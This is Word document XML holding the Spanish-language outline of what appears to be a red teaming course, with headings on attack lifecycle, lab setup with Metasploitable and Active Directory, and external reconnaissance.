    <w:p w14:paraId="23E10573" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2864"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="2864" w:hanging="685"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>¿Qué es el Red Teaming?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9ABF5C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2863"/>
        </w:tabs>
        <w:spacing w:before="92"/>
        <w:ind w:left="2863" w:hanging="684"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ciclo de vida de ataque del Equipo Rojo (fases)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DABD0D6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2864"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="2864" w:hanging="685"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Infraestructura del Equipo Rojo (Nomenclatura)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73778638" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2864"/>
        </w:tabs>
        <w:spacing w:before="90"/>
        <w:ind w:left="2864" w:hanging="685"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Descripción general del entorno empresarial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B650283" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2864"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="2864" w:hanging="685"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Explotación de Tecnologías en Red Teaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1E3247" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4606"/>
        </w:tabs>
        <w:spacing w:before="92"/>
        <w:ind w:left="4606" w:hanging="987"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Tecnología Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7BD411" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4605"/>
        </w:tabs>
        <w:spacing w:before="91"/>
        <w:ind w:left="4605" w:hanging="986"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Tecnología de red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8356D5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4605"/>
        </w:tabs>
        <w:spacing w:before="92"/>
        <w:ind w:left="4605" w:hanging="986"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Tecnología en la nube</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A70E3C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4605"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="4605" w:hanging="986"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Red Teaming físico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD9DA02" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4605"/>
        </w:tabs>
        <w:spacing w:before="90"/>
        <w:ind w:left="4605" w:hanging="986"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Inalámbrico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8D39C5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="298" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27EE1981" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1995"/>
        </w:tabs>
        <w:spacing w:line="651" w:lineRule="exact"/>
        <w:ind w:left="1995" w:hanging="811"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Configuración de Red Team Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745522A8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="179"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="011F7B19" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2588"/>
        </w:tabs>
        <w:ind w:left="2588" w:hanging="684"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Configuración y configuración del entorno virtual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC22F7F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2589"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="2589" w:hanging="685"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Configuración de la máquina atacante</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A4E491" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2589"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="2589" w:hanging="685"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Configuración externa de Red Team Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE17452" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4423"/>
        </w:tabs>
        <w:spacing w:before="90"/>
        <w:ind w:left="4423" w:hanging="1078"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Información general sobre la configuración del laboratorio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33381D4B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4423"/>
        </w:tabs>
        <w:spacing w:before="92"/>
        <w:ind w:left="4423" w:hanging="1078"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Configuración de máquinas virtuales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC8A63C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5298"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="5298" w:hanging="513"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Instalación</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E9DF30F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5282"/>
        </w:tabs>
        <w:spacing w:before="91"/>
        <w:ind w:left="5282" w:hanging="497"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Instalación de máquinas para empleados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C82672F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2589"/>
        </w:tabs>
        <w:spacing w:before="92"/>
        <w:ind w:left="2589" w:hanging="685"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Configuración interna del laboratorio del Equipo Rojo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BD3CA8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4332"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="4332" w:hanging="987"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Información general sobre la configuración del laboratorio interno</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CCD6EA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4331"/>
        </w:tabs>
        <w:spacing w:before="90"/>
        <w:ind w:left="4331" w:hanging="986"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Configuración del laboratorio de Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445DBFB3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5298"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="5298" w:hanging="513"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Controlador de dominio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B90170F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5282"/>
        </w:tabs>
        <w:spacing w:before="92"/>
        <w:ind w:left="5282" w:hanging="497"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Máquina unida a un dominio: configuración de la máquina del empleado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D17CE8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5277"/>
        </w:tabs>
        <w:spacing w:before="90"/>
        <w:ind w:left="5277" w:hanging="492"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Máquina unida a un dominio: configuración del servidor de aplicaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB19DAF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="320" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="298" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64FB0E66" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2001"/>
        </w:tabs>
        <w:spacing w:line="642" w:lineRule="exact"/>
        <w:ind w:left="2001" w:hanging="817"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Red Teaming en Entorno Externo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E64585E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A9EC48C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2589"/>
        </w:tabs>
        <w:ind w:left="2589" w:hanging="685"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Descripción general de la infraestructura externa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E703C0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2589"/>
        </w:tabs>
        <w:spacing w:before="92"/>
        <w:ind w:left="2589" w:hanging="685"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Explotación de servicios expuestos externamente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7487D53B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4331"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="4331" w:hanging="986"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Recopilación de información</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0C3BA3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
